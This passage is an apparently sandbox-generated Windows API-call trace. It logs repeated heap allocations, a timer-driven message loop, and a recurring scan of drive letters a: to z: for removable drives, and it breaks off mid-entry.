RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.196] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.196] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0218.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0218.197] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.197] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.197] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.197] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.198] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.198] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.198] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.198] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.198] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.199] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.199] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.199] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.200] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.200] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.200] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.201] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.201] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.201] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.201] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.201] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.202] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.202] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.202] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.202] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.202] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.203] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.203] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.203] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.212] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.212] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.213] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.213] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.213] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.213] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.213] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.213] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.213] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0218.213] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.214] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.214] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.214] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.214] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.215] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.215] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0218.215] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0218.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.215] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.215] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.216] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.216] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.216] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.216] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.216] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.217] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.217] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.217] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.217] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.218] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.218] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.218] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.218] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.219] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.219] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.219] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.219] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.219] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.219] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.220] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.220] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.220] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.220] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.220] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.221] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.221] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.221] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.221] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0218.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.221] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.222] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.222] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.222] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.222] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.222] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260e0 [0218.222] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.222] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260e0 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0218.223] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0218.223] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.223] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.223] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.223] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.223] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.224] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.224] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.224] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0218.224] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.224] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.224] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.225] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.225] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.225] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.225] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.225] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.226] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.226] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.226] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.226] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.226] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.227] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.227] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.228] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.228] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.228] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.228] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.228] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.229] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.229] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.229] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.229] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.229] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.230] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.230] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.230] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0218.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.231] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.231] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.231] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.231] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.231] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.231] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.231] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.231] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0218.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0218.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.232] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.232] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.232] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0218.232] PeekMessageW (in: lpMsg=0x7dfb8c, 